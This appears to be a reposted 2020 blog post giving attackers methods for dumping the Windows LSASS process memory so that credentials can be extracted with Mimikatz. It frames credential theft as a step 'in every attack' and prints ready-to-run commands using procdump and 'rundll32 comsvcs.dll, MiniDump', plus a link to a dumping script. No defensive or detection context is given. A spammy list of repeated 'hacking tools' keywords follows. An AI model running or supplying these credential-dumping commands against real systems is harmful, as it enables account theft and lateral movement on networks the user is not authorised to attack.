Tuesday, April 14, 2020

LSASS Dumping Methods ( For Mimikatz )


In every attack we need to get the windows credentials, this super important task. We need to target "LSASS.EXE" process and dump the process memory so that we can use it for extracting credentials using Mimikatz.


Here are some of the important methods,

Using ProcDump :

1. Favorite method of dumping is using "procdump.exe". This tool is from Microsoft Pstools
2. Download ProcDump.exe and upload in on remote system
3. Command : "procdump -ma lsass.exe lsass.dmp"


Using VB Script :

Download script from here :
https://drive.google.com/open?id=1jwy40ykrdEHWB1sddZ-Q5USDX9OOPOPp













rundll32 Command :

Essentially previous method VBS script is using following command for dumping Lsass.exe process

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 992 C:\Users\Public\lsass.bin full

So in case you do not have VB Script with you still you can fire-up the command and dump LSASS process.



















This article is the property of Tenochtitlan Offensive Security. Verlo Completo --> https://tenochtitlan-sec.blogspot.com

Related word


  1. Hack Tools For Windows
  2. Bluetooth Hacking Tools Kali
  3. Bluetooth Hacking Tools Kali
  4. Hack Tools For Windows
  5. Hack Tools 2019
  6. Hacker Tools Free
  7. Hacking Tools Github
  8. Hacker Tools Software
  9. Hacker Tools Apk
  10. Pentest Recon Tools
  11. How To Make Hacking Tools
  12. Hacker Tools For Mac
  13. Tools 4 Hack
  14. Pentest Tools List
  15. Pentest Tools Nmap
  16. Underground Hacker Sites
  17. Hack Rom Tools
  18. Hack Tools 2019
  19. Hacker Techniques Tools And Incident Handling
  20. Hacker Tools For Mac
  21. Hacking Tools 2020
  22. Hacking Tools For Mac
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)